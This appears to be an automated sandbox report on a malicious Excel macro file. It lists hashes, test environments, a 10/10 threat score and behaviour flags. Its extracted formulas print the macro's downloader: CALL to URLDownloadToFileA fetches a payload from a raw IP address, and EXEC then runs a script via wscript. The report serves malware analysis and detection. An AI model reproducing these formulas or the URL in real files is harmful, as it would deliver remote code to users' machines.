General
Target: 27bf04a23d1e8e9211d8ac52d4e402fd
Size: 6KB
Sample: 231221-3lrypaddg2
MD5: 27bf04a23d1e8e9211d8ac52d4e402fd
SHA1: e8bc0c80b2099eb4c51aeef9b5873bfb2974aa75
SHA256: d360be15b2c924e258e65b96ad5b4cb755669c0f047dcd5d9e79ab7a156a4a47
SHA512: 244d6d42ed10ab1620565a7905ebf5c2c500434c4d112166d8492dfb12b97739b3d52a4b4b0e3e54183fc517ad5797fdcb2cdb89e71707093677021c11853296
SSDEEP: 192:NDSyuSgbrA2OmmfRz8UhHFBFYu1b98yhy+B:NFudM2wB1FYgb98yhp
Static task: static1
Behavioral task: behavioral1
  Sample: 27bf04a23d1e8e9211d8ac52d4e402fd.xlsm
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: 27bf04a23d1e8e9211d8ac52d4e402fd.xlsm
  Resource: win10v2004-20231215-en
Malware Config
Extracted URLs:
http://46.17.98.187/index.php
http://google.com/index.php
Formulas:
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
Score: 10/10
Process spawned unexpected child process: This typically indicates the parent process was compromised via an exploit or macro.
Process spawned suspicious child process: This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.